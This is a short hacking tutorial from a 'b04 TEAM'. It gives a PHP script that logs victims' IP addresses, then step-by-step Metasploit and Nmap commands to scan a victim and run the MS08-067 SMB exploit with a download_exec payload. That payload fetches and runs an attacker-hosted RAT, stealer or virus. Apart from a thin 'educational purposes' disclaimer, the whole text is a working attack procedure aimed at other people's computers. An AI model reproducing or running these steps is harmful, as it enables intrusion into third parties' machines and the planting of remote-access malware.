THIS TUTORIAL IS WRITTEN IN EDUCATIONAL PURPOSES ONLY!! AND We "b04 TEAM" IS NOT RESPONSIBLE FOR ANYTHING YOU DO FOLLOWING IT, AND WE DONT RECOMMEND YOU TO USE THIS ON OTHER PEOPLES COMPUTER, ITS WRITTEN ONLY TO USE ON YOUR "OWN" COMPUTER!!
Needs (just google them):
1. Nmap
2. Metasploit
1. First we need to find victms IP.
__
a) http://www.s33.net/rec/home
Script for stealing IP adress:
<?
$file = "ip.txt";
$ip = $_SERVER['REMOTE_ADDR'];
$handle = fopen($file, 'a');
fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "\n");
fclose($handle);
?>2. Now we need to create database.
We open metasploit and type 'db_create' (this will create database)
If you created database before, than its enough to type 'db_connect' ...
3. Now we scan victms IP
So in metasploit type 'Nmap'
Next command is 'nmap -sT -sV <target ip>' (in '<target ip>' we type victms IP without '<>')
When scanning is done, we will have detailed description victms computer...
If we get something like this Windows 2000 (all versions XP SP1, SP2, SP3, SP4) We can without problem do the attack..
4. Exploit
In console we type 'use windows/smb/ms08_067_netapi'
(This will select windows/smb/ms08_067_netapi)
Now type 'set target 0'
Than type 'show payloads'
Than 'set payload / download_exec'
Than type 'Show options'
You will se enough of options, fill only RHOST i URL.
Type: set RHOST <target IP>
Than type 'set URL http://www.site.com/xxx.exe' ('http://www.site.com/ -should be your site , a 'xxx.exe' is name of your RAT, stiler, virus what is uploaded on your site)
(http://www.fileave.com , http://www.zymic.com)
AT the end we type 'exploit'
(This will run file witch you chose in step above)
